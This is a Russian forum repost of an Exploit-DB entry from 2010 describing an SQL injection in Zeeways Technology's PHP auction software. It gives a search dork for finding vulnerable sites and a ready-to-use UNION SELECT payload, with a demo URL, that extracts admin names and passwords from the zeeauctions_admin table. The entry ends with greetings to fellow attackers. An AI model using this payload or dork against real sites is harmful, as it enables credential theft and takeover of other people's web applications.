- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11047
- Проверка EDB
-
- Пройдено
- Автор
- GAMOSCU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-01-07
Код:
#############################################################
# Zeeways Technology (product_desc.php) SQL Injection Vulnerability
# Vendor: http://www.zeeways.com/
# Author: Gamoscu
# Site: www.1923turk.com
# Blog: http://gamoscu.wordpress.com/
##############################################################
# DORK :powered by zeeways
# Exploit: xxxxx/xxx/product_desc.php?id=[SQL-inj]
# -1/**/union/**/all/**/select/**/1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
# Demo: http://server/product_desc.php?id=-1/**/union/**/all/**/select/**/1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
##############################################################
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################
Vatan Lafla Deðil Eylemle Sevilir
Kiskananlar catlasin Zorunuza Gitmesin
- Источник
- www.exploit-db.com